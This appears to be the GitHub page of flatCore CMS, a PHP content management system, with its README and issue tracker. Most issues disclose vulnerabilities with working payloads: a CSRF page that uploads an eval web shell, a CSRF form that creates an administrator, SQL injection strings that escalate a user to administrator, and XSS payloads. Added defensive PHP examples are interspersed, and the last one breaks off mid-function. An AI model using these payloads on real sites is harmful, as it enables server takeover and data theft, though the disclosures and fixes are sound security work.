
+++ Attention +++

The project flatCore CMS pauses for an undefined time! For various reasons, it is currently not possible for me to spend the necessary time that a project with this scope requires.

+++ Attention (German notice) +++

The flatCore CMS project is paused for an indefinite time! For various reasons, I am currently unable to spend the time that a project of this scope requires.

flatCore CMS

flatCore is a lightweight Content Management System based on PHP and MySQL or SQLite.


⭐ give us a star, it motivates us a lot.

User manual and Developer Documentation

Technical requirements

  • Software: PHP 7.3+
  • Web Server: Apache with PDO/SQLite Module and mod_rewrite
  • Database: SQLite, MySQL 5.6+ (optional)

Contribution

You are very welcome to take part in this project. We are grateful for every contribution. Please submit your code to the develop branch and open a pull request.

The develop branch is merged into the main branch as soon as a new stable version is ready.

3rd Party Frameworks and Plugins

Contributors

bykof, dependabot[bot], haxatron, luba16, patkon, pristaff, vaya-the-dog


Issues

Upload web shell flatcore Version 2.0.8

Upload web shell
A clear and concise description of what the bug is.

To Reproduce
Steps to reproduce the behavior:

  1. Login to flatcore CMS (admin user)
  2. Click on 'Addons'
  3. Click on 'Install'
  4. Click on 'Plugin'
  5. Choose a malicious PHP file, for example webshell.php
  6. URL for the malicious PHP file: http://domain/upload/plugins/webshell.php

Screenshots
This is the PoC for the vulnerability: https://youtu.be/3w1M9eL_JiI
file payload
webshell.zip

Desktop (please complete the following information):

OS: tested in Linux
Browser : All
Version : Last version

Additional context
This vulnerability is extremely serious and affects the whole system. An attacker can take control of the entire server.

Error in Posts -> Gallery

If you create a gallery and add images before the gallery has been saved, ALL input is lost.

Comments page - wrong link

The link icon for comments on "ungeordnete Seiten" leads to
"The requested URL /acp/core/ajax.comments.php was not found on this server."
because it is missing the subfolder, e.g. http://example.com/myFlatCoreInstall/acp/....

If you put it on the left side, "geordnete Seiten", you get "The requested content cannot be loaded."

Tested on 1.4.7 B: 76

How about the new PHP 7

Does anybody know whether FlatCore runs on PHP 7, or has anybody tested it?
I think it is not difficult to get it running on PHP 7.

Code execution vulnerabilities in the background

Describe the bug
Code execution vulnerabilities in the background

To Reproduce
Steps to reproduce the behavior:
  1. Log in to the background
  2. Go to /acp/acp.php?tn=pages&sub=new#position
  3. Click info and enter the malicious php code in the Permalink parameter to jump out of the structure to execute the malicious code
  4. Click save
  5. /content/cache/active_urls.php and /content/cache/cache_lastedit.php files will be inserted with malicious code
  6. Visit the homepage and you will see that the malicious code we inserted was successfully executed and returned the result

Screenshots

Click Save New Page

/content/cache/active_urls.php and /content/cache/cache_lastedit.php files will be inserted with malicious code

Desktop (please complete the following information):

  • OS: MacOS
  • Browser All
  • Version Last version
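As an added illustration of the cache-file problem this report describes (this is not code from flatCore or from the reporter): writing a permalink into a PHP file as source text lets data become code, whereas emitting the same data with var_export() or storing it as JSON cannot. File names, function names and the sample permalink values below are my assumptions.

```php
<?php
// Added example, not flatCore's own code: why writing a user-controlled
// permalink into a PHP cache file by string interpolation is code injection,
// and two safe ways to persist the same data. File names, function names and
// the sample values are assumptions made for this illustration.
declare(strict_types=1);

// UNSAFE pattern: the permalink is pasted into PHP source unescaped. A value
// containing a quote and a bracket ends the array literal early, and whatever
// follows is parsed as code the next time the cache file is included.
function write_cache_unsafe(string $file, array $urls): void
{
    $php = "<?php\n\$active_urls = [\n";
    foreach ($urls as $id => $permalink) {
        $php .= "    '" . $id . "' => '" . $permalink . "',\n";
    }
    $php .= "];\n";
    file_put_contents($file, $php, LOCK_EX);
}

// SAFE (1): var_export() emits a valid PHP literal with every string quoted
// and escaped, so data cannot turn into code. Written atomically so a
// half-written file is never included.
function write_cache_php(string $file, array $urls): void
{
    $php = "<?php\nreturn " . var_export($urls, true) . ";\n";
    $tmp = $file . '.' . bin2hex(random_bytes(4)) . '.tmp';
    file_put_contents($tmp, $php, LOCK_EX);
    rename($tmp, $file);
}

// SAFE (2): keep the cache as data, not code. JSON is never executed.
function write_cache_json(string $file, array $urls): void
{
    file_put_contents($file, json_encode($urls, JSON_THROW_ON_ERROR), LOCK_EX);
}

function read_cache_json(string $file): array
{
    return json_decode((string) file_get_contents($file), true, 512, JSON_THROW_ON_ERROR);
}

// Independently, reject permalinks that are not plain slugs at input time.
function valid_permalink(string $p): bool
{
    return (bool) preg_match('~^[a-z0-9]+(?:[-/][a-z0-9]+)*$~', $p);
}

// Constructed sample: entry 2 contains the characters that break the unsafe writer.
$dir  = sys_get_temp_dir();
$urls = ['1' => 'home', '2' => "about']; // not a permalink"];

write_cache_unsafe("$dir/unsafe_cache.php", $urls);
// The unsafe file now contains the raw text  ']; // not a permalink  right after
// the second array element: a parse error at best, attacker-chosen code at worst.
var_dump(strpos((string) file_get_contents("$dir/unsafe_cache.php"), "']; //") !== false); // bool(true)

write_cache_php("$dir/safe_cache.php", $urls);
$loaded = include "$dir/safe_cache.php";
var_dump($loaded['2'] === $urls['2']);                                  // bool(true): came back as data

write_cache_json("$dir/safe_cache.json", $urls);
var_dump(read_cache_json("$dir/safe_cache.json")['2'] === $urls['2']);  // bool(true)

var_dump(valid_permalink('news/2021-10'), valid_permalink($urls['2'])); // bool(true) bool(false)
```

The slug check is the input-side control; the var_export()/JSON writers are the output-side control, and the cache stays safe even if a later code path forgets the first.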

Bug Report: CSRF Vulnerability in files.upload-script.php on FlatCore

Title: CSRF Vulnerability in files.upload-script.php on FlatCore
Date: 26-May-2019
Discovered by: @Satuer from ABT Labs
Security: high (will cause the webshell to upload)
Software: https://github.com/flatCore/flatCore-CMS/archive/1.4.7.4.zip

Code: files.upload-script.php
There is no CSRF check, only an administrator check. (Moreover, there is no check on the file type, and the uploaded file name is not changed.)

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background.

Exploit:
We assume that FlatCore is installed at http://192.168.62.129/flatCore. Our target is acp/core/files.upload-script.php which is the page used to upload a new file. The given POC will upload a webshell to the website.

<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest() {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/flatCore/acp/core/files.upload-script.php", true);
    xhr.setRequestHeader("Accept", "application/json");
    xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=--------795986992");
    xhr.withCredentials = true;
    var body = "----------795986992\r\n" +
        "Content-Disposition: form-data; name=\"upload_destination\"\r\n" +
        "\r\n" +
        "../content/\r\n" +
        "----------795986992\r\n" +
        "Content-Disposition: form-data; name=\"w\"\r\n" +
        "\r\n" +
        "600\r\n" +
        "----------795986992\r\n" +
        "Content-Disposition: form-data; name=\"h\"\r\n" +
        "\r\n" +
        "500\r\n" +
        "----------795986992\r\n" +
        "Content-Disposition: form-data; name=\"fz\"\r\n" +
        "\r\n" +
        "2800\r\n" +
        "----------795986992\r\n" +
        "Content-Disposition: form-data; name=\"unchanged\"\r\n" +
        "\r\n" +
        "\r\n" +
        "----------795986992\r\n" +
        "Content-Disposition: form-data; name=\"file\"; filename=\"testwebshell.php\"\r\n" +
        "Content-Type: text/plain\r\n" +
        "\r\n" +
        "<?php eval($_REQUEST['parm']);?>\r\n" +
        "----------795986992--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) {
        aBody[i] = body.charCodeAt(i);
    }
    xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
    <input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

Before visiting the PoC, make sure you are logged in to an administrator account. Then open the HTML file and submit the form. The webshell has now been uploaded.

Screenshots:
First, the administrator logs in.

Then, the administrator visits the malicious webpage.

The attacker visits the webshell.

Suggestion: Check CSRF tokens on all POST requests.

Permission Missing

Describe the bug
Permission Missing (bug/feature)...

To Reproduce
Steps to reproduce the behavior:

  1. Go to login CMS
  2. Click on User >> create user with no actions (user1 ID=13)

Account admin (administrator ID=12)

  3. Edit account user1 >> in Username change to administrator >> Update User
     The login name can be changed arbitrarily. When the username is the same as the admin account's, the admin (ID = 12) cannot delete that user (ID = 13); when it matches another account, the duplicate account will be disabled.

Desktop (please complete the following information):

  • OS: All
  • Browser: All
  • Version: Last version

XSS in page description

Describe the bug
A user with page creation/editing rights can insert an XSS payload in the description field to trigger XSS when viewing all pages from the admin panel.
To Reproduce
Steps to reproduce the behavior:

  1. Click on 'Create New Page'
  2. Go to 'Meta Tags' tab
  3. In the 'description' section, insert arbitrary XSS payload
  4. Go to 'See all page'
  5. See error

Expected behavior
The XSS payload will be triggered for anyone who views this page description (especially an admin account).

Desktop (please complete the following information):

  • OS: tested on kali linux
  • Browser: tested on firefox
  • Version: 2.0.7

video PoC
https://youtu.be/XkjPdJvnMQ0

Additional context
This bug can be exploited by anyone who has edit/create page privileges.

SQL Injection vulnerability (Content DB) on FlatCore v1.4.6

Exploit Title: SQL Injection vulnerability (Content DB) on FlatCore v1.4.6
Date: 11-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
SQL Injection allows an attacker to run malicious SQL statements on a database and thus read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

Exploit:
The vulnerability is due to a non-parameterized SQL query at https://github.com/flatCore/flatCore-CMS/blob/master/core/functions/func_get_content.php#L17 and a few following lines. We assume that FlatCore is installed at http://localhost/flatcore/. The exploit URL is http://localhost/flatcore/' OR page_status='ghost' LIMIT 0,1 --. This effectively results in the following query being executed: SELECT * FROM fc_pages WHERE page_id = '' OR page_status='ghost' LIMIT 0,1 --', which allows an unauthenticated user to view all ghost/invisible pages without having links to them. The exploit URL can also possibly be modified to leak the content database using UNION based SQL injection attacks.

References:
https://www.owasp.org/index.php/SQL_Injection

Screenshots: Viewing ghost pages

Impact: Read data from the content database
Mitigation: Use of Parameterized SQL Queries

Store XSS in the Edit or Create New Snippets function

Describe the bug
Store XSS in the Edit or Create New Snippets function

To Reproduce
Steps to reproduce the behavior:

  1. Use the account to login to the admin interface
  2. Select the snippets function to create new or edit existing snippets
  3. Insert the XSS payload in the following locations, then save:
     • "Title" and "Keyword" fields in content
     • "URL" field in URL
  4. Back in the snippets management interface, the payload is executed
     XSS Payload:
     "><img src=a onerror=alert(document.domain)>
  5. Then every time the snippets function is used, the payload will execute

Desktop (please complete the following information):

  • OS: All
  • Browser: All
  • Version: Last version

Cross Site Scripting (XSS) in Install

Describe the bug
Cross Site Scripting (XSS) in the username section of the install page.
version: 2.1.0

To Reproduce
Steps to reproduce the behavior:

  1. Go to 'CMS Install Page'
  2. Insert an XSS payload in the username section:
     <script>alert(1)</script>
  3. Save
  4. See error

OS: all
Browser : all
Version : all

CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6

Exploit Title: CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6
Date: 08-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of FlatCore, we can use CSRF to perform actions on the admin dashboard by targeting an administrator.

Exploit:
We assume that FlatCore is installed at http://localhost/. Our target is acp/acp.php?tn=user&sub=new&edituser= which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges.

<html>
<body>
    <form method="POST" action="http://localhost/acp/acp.php?tn=user&sub=new&edituser=">
        <input type="hidden" name="user_nick" value="testcsrf" />
        <input type="hidden" name="user_registerdate" value="" />
        <input type="hidden" name="user_verified" value="verified" />
        <input type="hidden" name="nbr_of_groups" value="0" />
        <input type="hidden" name="user_newsletter" value="none" />
        <input type="hidden" name="user_firstname" value="" />
        <input type="hidden" name="user_lastname" value="" />
        <input type="hidden" name="user_mail" value="[email protected]" />
        <input type="hidden" name="user_company" value="" />
        <input type="hidden" name="user_street" value="" />
        <input type="hidden" name="user_street_nbr" value="" />
        <input type="hidden" name="user_zipcode" value="" />
        <input type="hidden" name="user_city" value="" />
        <input type="hidden" name="user_psw_new" value="test" />
        <input type="hidden" name="user_psw_reconfirmation" value="test" />
        <input type="hidden" name="user_psw" value="" />
        <input type="hidden" name="drm_acp_class" value="administrator" />
        <input type="hidden" name="drm_acp_pages" value="drm_acp_pages" />
        <input type="hidden" name="drm_acp_editpages" value="drm_acp_editpages" />
        <input type="hidden" name="drm_acp_editownpages" value="drm_acp_editownpages" />
        <input type="hidden" name="drm_acp_files" value="drm_acp_files" />
        <input type="hidden" name="drm_acp_user" value="drm_acp_user" />
        <input type="hidden" name="drm_acp_system" value="drm_acp_system" />
        <input type="hidden" name="drm_moderator" value="drm_moderator" />
        <input type="hidden" name="drm_can_publish" value="drm_can_publish" />
        <input type="hidden" name="save_the_user" value="Save User" />
        <input type="submit" value="Submit!" />
    </form>
</body>
</html>

Before running the POC, make sure you are logged in to an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created.

References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

Screenshots:
Before the exploit
Exploit page
After submitting the form
New user added
With admin access

Impact: Compromises the entire web application and user data
Mitigation: Use of CSRF tokens

Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the Global Headers (HTML) features can be misused to inject JS into the website.
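Both CSRF reports on this page (the files.upload-script.php upload and the administrator-creation form above) end with the same recommendation: a CSRF token on every POST. The following is an added example of that control, written for this page; it is not flatCore's own code or the reporters' code. The function names, the session key, the hidden field name csrf_token and the SameSite cookie setup are my assumptions.

```php
<?php
// Added example, not flatCore's own code: synchronizer-token CSRF protection
// for state-changing ACP endpoints such as acp.php?tn=user&sub=new and
// acp/core/files.upload-script.php. Function names, the session key and the
// form field name are assumptions made for this illustration.
declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';

/** Start the session with cookie flags that already blunt CSRF and cookie theft. */
function secure_session_start(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    session_set_cookie_params([          // array form: PHP 7.3+
        'httponly' => true,
        'secure'   => !empty($_SERVER['HTTPS']),
        'samesite' => 'Lax',             // browser withholds the cookie on cross-site POST
    ]);
    session_start();
}

/** Per-session token, created on first use. */
function csrf_token(): string
{
    secure_session_start();
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

/** Hidden input to place in every ACP form (user editor, file upload, ...). */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Accept a POST only if it carries the session's token (constant-time compare).
 * The attacker's page in the reports can make the victim's browser send the
 * session cookie, but it cannot read the token out of a page on our origin.
 */
function csrf_check_post(array $post, array $server): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        return false;
    }
    // Defence in depth: when the browser sends Origin, it must be our own host.
    if (isset($server['HTTP_ORIGIN'])) {
        $origin   = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $expected = parse_url('http://' . ($server['HTTP_HOST'] ?? ''), PHP_URL_HOST);
        if ($origin === null || $origin === false || $origin !== $expected) {
            return false;
        }
    }
    return true;
}

// Usage at the top of each state-changing ACP script, before any work is done:
if (PHP_SAPI !== 'cli' && !csrf_check_post($_POST, $_SERVER)) {
    http_response_code(403);
    exit('Missing or invalid CSRF token');
}
// ... continue with "save_the_user", the file upload, etc. ...
```

The token check is the primary control; SameSite=Lax and the Origin comparison only narrow the window in which a forged request could still arrive (for example from an old browser), so none of the three should be relied on alone. Every form in the ACP, including the Global Headers editor mentioned above, needs the csrf_field() output and the server-side check.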

Remote Code Execution via Module Addons FlatCore_CMS 2.0.7

Describe the bug
An attacker can upload arbitrary executable PHP code via Module Addons to execute commands on the server.

To Reproduce
Steps to reproduce the behavior:

  1. Log into the panel.
  2. Go to "/acp/acp.php?tn=moduls&sub=u"
  3. Click Module > Install > Upload payload file zip.
  4. Click file upload install.
  5. Go to view remote code execution server.

Screenshots

File payload: rce.zip

Desktop (please complete the following information):

  • OS: Linux
  • Browser : All
  • Version : Last version

redirected you too many times

how are you?

For [Version 2.1.1]: after I installed it, when I open the site it cannot be opened:
This page isn’t working
redirected you too many times.
ERR_TOO_MANY_REDIRECTS

For [Version 2.1.0], it is OK.

.htaccess

Alert in ACP > Dashboard if no .htaccess file exists

(Re)name /acp/

Maybe the directory /acp/ should be named dynamically? Immediately at installation or later via FTP.

RCE via upload addons plugin

RCE via upload addon plugin
It was identified that an authenticated user (admin) has the possibility to upload malicious files without any restriction. In this specific case, arbitrary server side PHP code such as web shells can be uploaded. As a result the attacker can run arbitrary code on the server side with the privileges of the web server. This could lead to a full system compromise.

To Reproduce
Steps to reproduce the behavior:

  1. Login to flatcore CMS (admin user)
  2. Click on 'Addons'
  3. Click on 'Install'
  4. Click on 'Plugin'
  5. Choose a malicious PHP file (reverse shell, webshell, ...), for example shell.php
  6. URL for the malicious PHP file: http://domain/upload/plugins/shell.php

Screenshots

Desktop (please complete the following information):

  • OS: tested in Linux
  • Browser : All
  • Version : Last version

Additional context
This vulnerability is extremely serious and affects the whole system. An attacker can take control of the entire server.

Translation

The German language version only uses the formal "Sie". It is common to also have an informal "Du" version.

Cross Site Scripting (XSS)

Describe the bug
Cross Site Scripting (XSS) via upload image function

To Reproduce
Steps to reproduce the behavior:

  1. Login to flatcore CMS
  2. Click on 'Upload file'
  3. Drop an SVG file containing an XSS payload, example filename: xss.svg
  4. The XSS triggers at the URL: http://domain/content/images/payload1.svg

Screenshots
https://raw.githubusercontent.com/tranquac/POC/main/xss_flatcoreCMS.PNG

xss.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS in flatCore CMS");
   </script>
</svg>

Desktop (please complete the following information):

  • OS: All
  • Browser : All
  • Version : Last version

Additional context
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user

Pagemanager

What your CMS is still missing is a page manager with tree view, which gives a much better overview (this exists as a plugin for WordPress, Typesetter, CMSimple etc.).

Table fc_tokens does not exist

The table fc_tokens is not created by the installer.

On the first login I get
Fatal error: Call to a member function bindValue() on boolean in /core/functions/func_userdata.php on line 209

I then added errorInfo, with the following result:
Array ( [0] => HY000 [1] => 1 [2] => no such table: fc_tokens )

Responsible disclosure policy

Hey there!

I belong to an open source security research community, and a member (@Haxatron) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

English with the dashboard

Have installed flatCore and have changed the $languagePack = "en";
But the admin area is in German or Dutch.
How do I fix this?
Tom

XSS

Describe the bug
XSS in function Posts

To Reproduce
Steps to reproduce the behavior:

  1. Login to CMS
  2. Click on 'Posts' >> 'New Entry' >> Image
  3. In Meta Data >> inject payload into Title

payload: "><img src="x" onerror=alert(String.fromCharCode(88,83,83));>

Desktop (please complete the following information):

  • OS: All
  • Browser : All
  • Version: Last version

Stored XSS in Index

Describe the bug
Cross Site Scripting (XSS) via save Exclude URLs

To Reproduce
Steps to reproduce the behavior:

  1. Login to flatcore CMS
  2. Click on 'Create new Page' after click 'Index'
  3. Insert an XSS payload in Exclude URLs:
     <script>alert(1)</script>
  4. Save; the stored XSS fires on: http://domain/acp/acp.php?tn=pages&sub=index

Desktop (please complete the following information):

  • OS: all
  • Browser : all
  • Version : all

Additional context
The XSS attack will help the hacker get the login session of other users requiring them to have at least one "Create new Pages" permission.

Bug Report: XSS Vulnerability in acp.php on FlatCore v1.4.6

Title: XSS Vulnerability in acp.php
Security: Low (visit acp.php as a administrator)
Software: https://codeload.github.com/flatCore/flatCore-CMS/zip/v1.4.6
Code: pages.edit_form.php

Reproduce (get client cookie information):
http://localhost/fc/acp/acp.php/p3q7o'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eoqch8?tn=pages&sub=edit&editpage=2

reference about XSS:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Discovered by: ghi from Huawei Weiran Labs

Multiple XSS (reflected and stored)

Hey,

I found 2 XSS in your application:

1. Reflected XSS in index.php / user_management.php

Your user_management.php is vulnerable to reflected XSS:
http://127.0.0.1/index.php/%22%3C/a%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
This is because you use $_SERVER['PHP_SELF'] to build links.

This is verified with the github version as well as with Version: 1.4.6

2. Stored XSS in logfile

Version 1.4.6 from your website is also vulnerable to stored xss by the following request:

GET /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: <script>alert(123)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1

This is triggered when the administrator opens the log view.

Cheers

Looking for flatCore Members

Hello everyone,
as this project is getting more and more time consuming, I urgently need help for maintaining. From answering issues, fixing bugs, improving the core and so on ...
If you are interested, just get in touch here or by email: [email protected]

Create Page XSS

Describe the bug
The XSS payload written into the meta tags and the content is not filtered.

https://owasp.org/www-community/attacks/xss/

To Reproduce
Steps to reproduce the behavior:
  1. Press "create new page" from the home page
  2. Enter the XSS payload in the meta tags and the content
  3. Go to the admin panel, press the "go to home page" button, and the XSS pops up

Expected behavior
A clear and concise description of what you expected to happen.

Screenshots
If applicable, add screenshots to help explain your problem.


Additional context
POC : https://www.youtube.com/watch?v=wmQf0B3Sa6c

SQL Injection vulnerability (Users DB) on FlatCore v1.4.6

Exploit Title: SQL Injection vulnerability (Users DB) on FlatCore v1.4.6
Date: 11-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

Exploit:
The vulnerability is due to a non-parameterized SQL query at https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L37. This vulnerability along with missing validation on the email field of the registration and password reset forms can be used to create an administrator account with full privileges. We assume that FlatCore is installed at http://localhost/flatcore/ and new registrations are enabled.

  1. Go to http://localhost/flatcore/register/. Fill in the username uname and some password. Fill in the email fields as '; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --. This step is required since the password reset form checks for valid emails in the DB before reset.
  2. Since the register page uses parameterized query, the whole email string will be stored in the DB.
  3. Now go to http://localhost/flatcore/password/ and put in the email address mentioned while registering. Due to https://github.com/flatCore/flatCore-CMS/blob/master/core/password.php#L36, the query will effectively become UPDATE fc_user SET user_reset_psw = '$reset_token' WHERE user_mail = ''; UPDATE fc_user SET user_class='administrator', user_verified='verified', user_drm='||drm_acp_user|||||' WHERE user_nick='uname' --.
  4. As you can see, this will set administrator as the user class for the newly created user uname and will also give it permission to manage the user management screen.
  5. Once inside the admin panel, the attacker can give himself extra privileges.

References:
https://www.owasp.org/index.php/SQL_Injection

Screenshots:
Registration form
Password reset
New user created and verified with ability to edit users
Logged in as new user and changed privileges

Impact: Read and modify the users database
Mitigation: Use of Parameterized SQL Queries and Validation on email fields
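Both SQL injection reports on this page name the same mitigation: parameterized queries, plus validation of the email field for the password-reset path. The block below is an added example written for this page (not flatCore's code and not the reporters' code) that rewrites the two affected lookups, the page query by page_id and the reset-token update by user_mail, as PDO prepared statements and runs them against an in-memory SQLite database. The minimal schema and the sample rows are constructed for the demonstration; the table and column names follow the reports.

```php
<?php
// Added example, not flatCore's own code: the two queries named in the SQL
// injection reports (page lookup by page_id, password-reset update by
// user_mail) written as PDO prepared statements and exercised against an
// in-memory SQLite database. The schema below is a constructed minimal one.
declare(strict_types=1);

function connect(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE fc_pages (page_id TEXT PRIMARY KEY, page_status TEXT, page_content TEXT)');
    $db->exec('CREATE TABLE fc_user (user_id INTEGER PRIMARY KEY, user_nick TEXT, user_mail TEXT, user_class TEXT, user_reset_psw TEXT)');
    $db->exec("INSERT INTO fc_pages VALUES ('home', 'public', 'Hello'), ('secret', 'ghost', 'Hidden')");
    $db->exec("INSERT INTO fc_user (user_nick, user_mail, user_class) VALUES ('alice', 'alice@example.com', 'user')");
    return $db;
}

// UNSAFE (the pattern from the reports): the page id is concatenated into the SQL text.
function get_page_unsafe(PDO $db, string $pageId): ?array
{
    $row = $db->query("SELECT * FROM fc_pages WHERE page_id = '$pageId' LIMIT 0,1")->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// SAFE: bound parameters; the value can never change the structure of the query,
// and the status condition cannot be commented out from the outside.
function get_page(PDO $db, string $pageId): ?array
{
    $st = $db->prepare('SELECT * FROM fc_pages WHERE page_id = :id AND page_status = :status LIMIT 1');
    $st->execute([':id' => $pageId, ':status' => 'public']);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// SAFE: password reset. Validate the address first, then bind both values.
function set_reset_token(PDO $db, string $mail): ?string
{
    if (filter_var($mail, FILTER_VALIDATE_EMAIL) === false) {
        return null;                              // "'; UPDATE ..." is not an address: reject outright
    }
    $token = bin2hex(random_bytes(32));
    $st = $db->prepare('UPDATE fc_user SET user_reset_psw = :token WHERE user_mail = :mail');
    $st->execute([':token' => $token, ':mail' => $mail]);
    return $st->rowCount() === 1 ? $token : null; // unknown address: no token issued
}

$db = connect();
$hostile = "' OR page_status='ghost' LIMIT 0,1 --";                  // the first report's input
var_dump(get_page_unsafe($db, $hostile)['page_id'] ?? null);         // string(6) "secret": ghost page leaked
var_dump(get_page($db, $hostile));                                    // NULL: treated as a literal id
var_dump(get_page($db, 'home')['page_content']);                      // string(5) "Hello"
var_dump(set_reset_token($db, "'; UPDATE fc_user SET user_class='administrator' --") === null); // bool(true)
var_dump(strlen((string) set_reset_token($db, 'alice@example.com'))); // int(64)
```

The registration form already used a prepared statement in the second report, which is exactly why the payload survived into the database intact; the lesson is that every query touching a column must be parameterized, not only the one that writes it.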

Stored Cross Site Scripting at Group Creation

Vulnerability : Stored XSS
Severity : High
Parameter : group_name

Steps to reproduce :

  1. Go to Dashboard -> Left navigation menu -> Under "User" drop down select "Edit Usergroup" button.
  2. Place a payload "> in the group_name parameter "group name"
  3. Fill the required fields, add users and click on Save button
  4. Navigate to "Show all user", choose the users which you added to the group and click on "Edit"
  5. It can be observed that the XSS payload is executed in the application
  6. Log out of the application and log in with valid user credentials
  7. Go to "Show all user", click on the users tab, and you will see the stored XSS payload is executed in the application

What is the Impact ?

This vulnerability allows an attacker to either permanently or temporarily inject client-side code into the target website. This code executes when the page is loaded by the victim and the client-side code may carry out activities such as: stealing cookies/sessions, modifying the page contents, logging key strokes, etc.

How to Fix ?

Sanitize the data collected from input fields before further processing

Proof : https://www.youtube.com/watch?v=sNHJAlep3cM&feature=youtu.be

Regards,
Jashwanth

XSS in Upload file function

Describe the bug
XSS via upload file function

To Reproduce
Steps to reproduce the behavior:

  1. Log in to the backend
  2. Click on 'Files' >> 'Upload Files'
  3. Drop a PDF file containing an XSS payload
  4. Vulnerable URL: http://domain/content/files/poc.pdf

File payload: poc.pdf

Desktop (please complete the following information):

  • OS: All
  • Browser: chrome
  • Version: Last version

Additional context
An attacker can send malicious files to victims and steal the victim's cookie, leading to account takeover.
The person viewing the file of a contact can be a victim of XSS.
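Both this report and the SVG report above share a root cause that no upload filter fixes on its own: a file that is itself a valid document (SVG, PDF) is served from the site's origin with a type the browser will render, so any script inside it runs with the site's cookies. The following is an added example written for this page, not flatCore's code, of a download endpoint for content/ that serves only raster images inline and forces everything else to download under a generic type. The directory layout, the query parameter f and the function name are my assumptions.

```php
<?php
// Added example, not flatCore's own code: a download endpoint for files under
// content/ that never lets the browser render an upload as an active document
// in the site's origin. The directory layout, the query parameter "f" and the
// function name are assumptions made for this illustration.
declare(strict_types=1);

/** Send the requested file; returns the HTTP status used, for the caller's logs. */
function serve_upload(string $baseDir, string $requested): int
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested);
    // Path traversal check: the resolved path must stay inside the uploads tree.
    if ($base === false || $path === false || !is_file($path)
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        return 404;
    }

    // Only raster images are shown inline, and only when the bytes agree with the name.
    $inline = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
               'gif' => 'image/gif', 'webp' => 'image/webp'];
    $ext      = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($path) ?: 'application/octet-stream';

    header('X-Content-Type-Options: nosniff');                       // no MIME guessing by the browser
    header("Content-Security-Policy: sandbox; default-src 'none'");  // even if rendered: no script, opaque origin
    if (isset($inline[$ext]) && $detected === $inline[$ext]) {
        header('Content-Type: ' . $inline[$ext]);
        header('Content-Disposition: inline');
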